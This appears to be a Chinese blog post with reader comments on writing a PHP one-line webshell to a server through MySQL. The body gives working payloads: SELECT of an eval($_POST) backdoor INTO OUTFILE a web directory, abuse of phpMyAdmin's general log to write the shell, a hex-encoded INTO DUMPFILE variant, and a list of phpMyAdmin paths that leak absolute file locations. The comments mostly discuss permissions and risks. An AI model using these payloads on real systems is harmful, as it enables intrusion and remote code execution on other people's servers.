OnionT@KillBoy
479,5491字数 0阅读0分0秒阅读模式
AI智能摘要
想快速在MySQL中植入一句话木马却屡屡碰壁?本文深度揭秘两大实战技巧:如何巧妙绕过secure_file_priv权限限制,利用into outfile精准写入可执行目录;更揭露PHPMyAdmin日志配置漏洞的隐蔽利用路径。安全研究员亲测有效,不仅详解dumpfile加密绕过手法,还附带路径泄露漏洞检测清单。掌握这些渗透测试核心方法,你将彻底加固数据库防线——别等被黑才后悔,立即解锁防御主动权!
— AI 生成的文章内容摘要
1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启 如果: secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv = ,没有的话添加上 如果为一个目录,如:secure_file_priv = /home 那就只能导出到指定的目录,子目录也不行 如果为为空,如 secure_file_priv = ,说明可以导出到任意位置,注意等号一定要有 2、写入: select '<?php eval($_POST[kill]);?>' into outfile 'E:/phpStudy/PHPTutorial/WWW/kill1.php'; 导出的木马文件一定要在可执行的目录下,如果有phpinfo.php文件,可以确认一下;方法二:
如果可以进入PHPmyadmin,但是无法导出文件,这时,可以进入变量, 搜索 general logOFF --这个默认是off,关闭的,把它打开 general log file --设置日志文件及位置 然后执行查询 select "<?php eval($_POST['hacker']);?>" 就可以连接日志文件了补充:还可以直接用dumpfile来得到shell
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
加密部分为 lanker 一句话 密码为 cmd
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -
http://target/phpmyadmin/libraries/string.lib.php http://target/phpmyadmin/libraries/string.lib.php http://target/phpmyadmin/libraries/database_interface.lib.php http://target/phpmyadmin/libraries/db_table_exists.lib.php http://target/phpmyadmin/libraries/display_export.lib.php http://target/phpmyadmin/libraries/header_meta_style.inc.php http://target/phpmyadmin/libraries/mcrypt.lib.php
浙江省舟山市 1F
这段写得挺实在的。
广东省广州市 2F
dumpfile写法挺巧的。
江苏省无锡市 B1
@ 绯色之翼 是的,比直接outfile隐蔽一点。
福建省福州市 3F
secure_file_priv还能这么玩,真坑。
印度尼西亚 4F
这个outfile路径能写到linux的/var/www吗?
陕西省西安市 5F
这点提醒很关键,别忘了。
广东省东莞市 6F
如果secure_file_priv是空,记得检查mysqld的运行用户是否有写权限,否则outfile会报错。
上海市金山区 7F
我之前在同事的服务器上试过outfile,结果权限不够,改了my.cnf后才成功。
韩国 8F
general log打开后会不会对性能有明显影响?建议怎样配置比较安全?
广东省广州市 9F
那如果想把shell写入到web目录下的子文件夹,secure_file_priv会限制吗?实际上我在测试时发现,只要目标路径在配置的目录内部,仍然可以写入,但子目录需要手动创建权限。
广东省东莞市 B1
@ 踏月人 对的,主要看配置的目录范围,子目录权限问题很常见。
贵州省贵阳市 10F
看到文章里把php代码直接写进outfile,感觉像在玩火。实际操作时一定要先确认目标机器没有防火墙和SELinux限制,否则文件根本生成不了,甚至会被审计日志捕获。🤔
山东省东营市 11F
这招真的管用
韩国 B1
@ 铁血修罗 确实有用,但前提是环境配置得对得上。
日本 12F
secure_file_priv能设为空吗
韩国 13F
我之前也碰到权限不足,改my.cnf后才行
河北省石家庄市 14F
如果secure_file_priv指向目录,子目录需要自行创建并赋写权限,否则outfile会报错
浙江省 15F
在linux上,outfile能写到/var/www/html下吗,需要额外配置吗
韩国 16F
看到有人把php后门写进outfile,感觉像在玩火,真的很惊险,操作前一定要三思而后行,别让服务器瞬间变成靶子
韩国 17F
打开general log后,日志文件会不会很快填满,怎么定期清理比较好
上海市宝山区 18F
虽然文章演示了写入shell的技巧,但实际生产环境中,开启secure_file_priv空值会带来极大风险,建议始终限制到专用目录并配合SELinux策略
湖北省十堰市 B1
@ 白牡丹语 道理是这个道理,但新手看了可能真去试。
浙江省温州市 19F
写法挺巧
越南 B1
@ 章鱼墨墨 确实巧,但风险太高了。
江苏省无锡市 20F
这玩意儿太刺激了 😂
浙江省金华市 21F
secure_file_priv设为空也太危险了,服务器分分钟被搞。
上海市 22F
试过写入web目录,但nginx用户没权限,搞了半天。
辽宁省大连市 23F
用dumpfile写hex确实能绕过一些过滤,不过日志审计严的话还是会被发现。
印度 24F
这个路径在Windows下用反斜杠还是正斜杠?E:/phpStudy这个写法对吗?
贵州省贵阳市 25F
之前搞渗透测试的时候用过这招,但成功率不高,很多环境都限制了。
中国 26F
感觉一般,都是老方法了。
福建省泉州市 B1
@ Veilwhisper 老方法归老方法,有些老系统还真就吃这套。
日本 27F
图片里的服务器看着挺新的,实际很多老旧机器配置乱七八糟,根本对不上。
广东省广州市 28F
general log打开后性能影响大吗?有没有人测过具体数据?
中国 29F
要是能结合具体的CMS案例讲讲怎么找可写目录就更好了。
四川省泸州市 30F
这个操作对MySQL版本有要求吗?我用的8.0好像不太一样。
印度 31F
dumpfile那个写法没看懂,能解释一下吗?
湖北省武汉市 32F
secure_file_priv设空感觉有点冒险,一般都不敢这么配。
河南省郑州市 33F
这个配置对MySQL 5.7和8.0都适用吗?
新疆乌鲁木齐市 34F
用dumpfile写hex的方法确实能绕,不过现在很多WAF都会检查这种编码。
北京市 35F
之前遇到过secure_file_priv是目录,结果web目录不在里面,白折腾半天。
澳大利亚 36F
图片里服务器环境看着干净,实际很多机器乱得很,路径都对不上。
河南省开封市 37F
general log开久了日志文件会很大,得配个logrotate自动清理吧。
上海市 38F
如果web目录权限是www-data用户,mysql用户没权限写也是白搭。
山东省青岛市 39F
方法二通过日志文件写入的思路挺巧妙的,以前没想过可以这样。
韩国 40F
这些路径泄露的漏洞点现在新版的phpMyAdmin都修了吧?
上海市 41F
写的挺详细,就是操作起来风险太高,新手别乱试。